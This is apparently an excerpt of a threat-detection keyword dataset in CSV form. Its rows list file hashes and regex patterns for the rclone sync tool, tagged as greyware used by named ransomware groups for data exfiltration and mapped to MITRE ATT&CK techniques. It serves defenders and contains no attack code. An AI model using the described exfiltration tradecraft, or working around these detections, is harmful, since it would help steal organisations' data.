"*14c0b30920226f407724fd3461be0d1988d7df86c453b3bc982fdbec16ac91ab*",".{0,1000}14c0b30920226f407724fd3461be0d1988d7df86c453b3bc982fdbec16ac91ab.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*14c15801f53f57f5fa279950adace42b8b8bed4c4f2d790d1e73bb71659a9de9*",".{0,1000}14c15801f53f57f5fa279950adace42b8b8bed4c4f2d790d1e73bb71659a9de9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*14e2341ca927541a8d4bc545766f9bb8e1f7b79c15f1ea83836572e82b658c13*",".{0,1000}14e2341ca927541a8d4bc545766f9bb8e1f7b79c15f1ea83836572e82b658c13.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1508bf7cb951181238f77370466220239404cd475472081c8059eb3d74e668cb*",".{0,1000}1508bf7cb951181238f77370466220239404cd475472081c8059eb3d74e668cb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1526e61423a885f9c11c2479c287caddebaed466e4b08fccd9d1ac13b7be775e*",".{0,1000}1526e61423a885f9c11c2479c287caddebaed466e4b08fccd9d1ac13b7be775e.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1580dc09833da345f0ae3c8c3fc9da782628f8f6abf06062f9ce0af13e04c27a*",".{0,1000}1580dc09833da345f0ae3c8c3fc9da782628f8f6abf06062f9ce0af13e04c27a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1596547091d637278d0801f6ac2a625fa18bce9e74a5b3233b3ffb62357f3af0*",".{0,1000}1596547091d637278d0801f6ac2a625fa18bce9e74a5b3233b3ffb62357f3af0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*15bf47f400527b9a4a31edaa121e6111ea6a1dffe68eb83800c6f73074f298bf*",".{0,1000}15bf47f400527b9a4a31edaa121e6111ea6a1dffe68eb83800c6f73074f298bf.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*15f45c7dbae6b09ca503e3c029527d8895f2c8f36501de4975e9c1e1016982f9*",".{0,1000}15f45c7dbae6b09ca503e3c029527d8895f2c8f36501de4975e9c1e1016982f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*15faf5fb4dcfb25de4ee1d4cf02beee84b1ff88950d9ba53e56e545c6a3dbfc0*",".{0,1000}15faf5fb4dcfb25de4ee1d4cf02beee84b1ff88950d9ba53e56e545c6a3dbfc0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1616dd35a9d247654567642b4202a7b4ad4601b434d3da85671a1558fffbd4b2*",".{0,1000}1616dd35a9d247654567642b4202a7b4ad4601b434d3da85671a1558fffbd4b2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1622c597292ef12023346c95182323df859bce8d97582a00b0f96c7740abf5dd*",".{0,1000}1622c597292ef12023346c95182323df859bce8d97582a00b0f96c7740abf5dd.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*162f3ad5ad6b7cc9790807ff92eed85d08bd4b2702f5a2e88237c86e7773bc29*",".{0,1000}162f3ad5ad6b7cc9790807ff92eed85d08bd4b2702f5a2e88237c86e7773bc29.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*164336ad99e7c933c7f9ae24ce118361292a50cc3508bb0a108860b97e17bc87*",".{0,1000}164336ad99e7c933c7f9ae24ce118361292a50cc3508bb0a108860b97e17bc87.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1645bf0391156a98ed8cd08cf74a3b53620e85028c332913f8a6b688c20ee1b9*",".{0,1000}1645bf0391156a98ed8cd08cf74a3b53620e85028c332913f8a6b688c20ee1b9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*16591b2964f18f43e233be8bc1ba3eaf8aad5bc8ea2fb55aab8d01e990da01b6*",".{0,1000}16591b2964f18f43e233be8bc1ba3eaf8aad5bc8ea2fb55aab8d01e990da01b6.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*16b3e4ecfb6de838ec64b266e762f83e330fd29c1db5aeae46c12d5261cf2544*",".{0,1000}16b3e4ecfb6de838ec64b266e762f83e330fd29c1db5aeae46c12d5261cf2544.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*16bf64d6996f1f1764831eb66fd3c74c038e7a76ad25f9f9d6944c216da74c2c*",".{0,1000}16bf64d6996f1f1764831eb66fd3c74c038e7a76ad25f9f9d6944c216da74c2c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*174335ec26c20b8351100b7073eefe8d641049df628d4e10aa33cc24018a5836*",".{0,1000}174335ec26c20b8351100b7073eefe8d641049df628d4e10aa33cc24018a5836.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1844a00b5e416fcbb18be60e8519a594ebfb773a930bd1c819397fd22b2616f0*",".{0,1000}1844a00b5e416fcbb18be60e8519a594ebfb773a930bd1c819397fd22b2616f0.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*18602b36b09077e090abf0f5f4d846f05ca70e62471ff3d67fdb0bccaa387a9d*",".{0,1000}18602b36b09077e090abf0f5f4d846f05ca70e62471ff3d67fdb0bccaa387a9d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*18d40326c20c254f298564a899eb72419e418bdb7e3273e14efb17ebe0b68d12*",".{0,1000}18d40326c20c254f298564a899eb72419e418bdb7e3273e14efb17ebe0b68d12.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*194364fff5762c071f04644fe223f1fb97be80fc4289d2b20855bd5e943641a2*",".{0,1000}194364fff5762c071f04644fe223f1fb97be80fc4289d2b20855bd5e943641a2.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*19c515af1a70491e5a451f62fdfe41573face748e6d6ccd7cd61732fd1a076d5*",".{0,1000}19c515af1a70491e5a451f62fdfe41573face748e6d6ccd7cd61732fd1a076d5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*19e6eaa89377d7e40661f4fa52f6275db06e9785a23413ca7abb7dc64538e82c*",".{0,1000}19e6eaa89377d7e40661f4fa52f6275db06e9785a23413ca7abb7dc64538e82c.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*19eea7bdd183eb616b037a97eeee302a9afabdb0a8f5a4bec515214c19348327*",".{0,1000}19eea7bdd183eb616b037a97eeee302a9afabdb0a8f5a4bec515214c19348327.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a061f3b3048646be65595bc0bd0cff4a9afabac65be1c84ae9e03f577c8aef5*",".{0,1000}1a061f3b3048646be65595bc0bd0cff4a9afabac65be1c84ae9e03f577c8aef5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a1a3b080393b721ba5f38597305be2dbac3b654b43dfac3ebe4630b4e6406c3*",".{0,1000}1a1a3b080393b721ba5f38597305be2dbac3b654b43dfac3ebe4630b4e6406c3.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a306749771fda249ef439dcb9d82b1a54a72e56d1693853fdceba17f8542759*",".{0,1000}1a306749771fda249ef439dcb9d82b1a54a72e56d1693853fdceba17f8542759.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a3e926a0edaf65790c39af7e83d4884d39f99b7e95a176b4feb5bc89f051d48*",".{0,1000}1a3e926a0edaf65790c39af7e83d4884d39f99b7e95a176b4feb5bc89f051d48.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a5142e3dab3f5562a6263bdda31dc4986e9457fc3a8ce0c61c339040d2f175f*",".{0,1000}1a5142e3dab3f5562a6263bdda31dc4986e9457fc3a8ce0c61c339040d2f175f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1a67be9a8bb43e9654b8c888ba700d5c737041952022544dbada4e4032b4d0ac*",".{0,1000}1a67be9a8bb43e9654b8c888ba700d5c737041952022544dbada4e4032b4d0ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1ac730e020f0925a3695bd5712803d52c981d31af54413b609fd9878a7ee0ed7*",".{0,1000}1ac730e020f0925a3695bd5712803d52c981d31af54413b609fd9878a7ee0ed7.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1aca05451d4f7ecde7301845969dbc9fe7e1ebfde9eb725dfc66df3892f2f8db*",".{0,1000}1aca05451d4f7ecde7301845969dbc9fe7e1ebfde9eb725dfc66df3892f2f8db.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1acf3b83f3433c08fb6f8293709c72a72fbb60ba1514c13cfbe6509b4116afb1*",".{0,1000}1acf3b83f3433c08fb6f8293709c72a72fbb60ba1514c13cfbe6509b4116afb1.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
"*1af017efc1e96bfb6cb5e3a1224b503a3a8da4b0333bd8f2fd3bc6022a24f7a8*",".{0,1000}1af017efc1e96bfb6cb5e3a1224b503a3a8da4b0333bd8f2fd3bc6022a24f7a8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z"
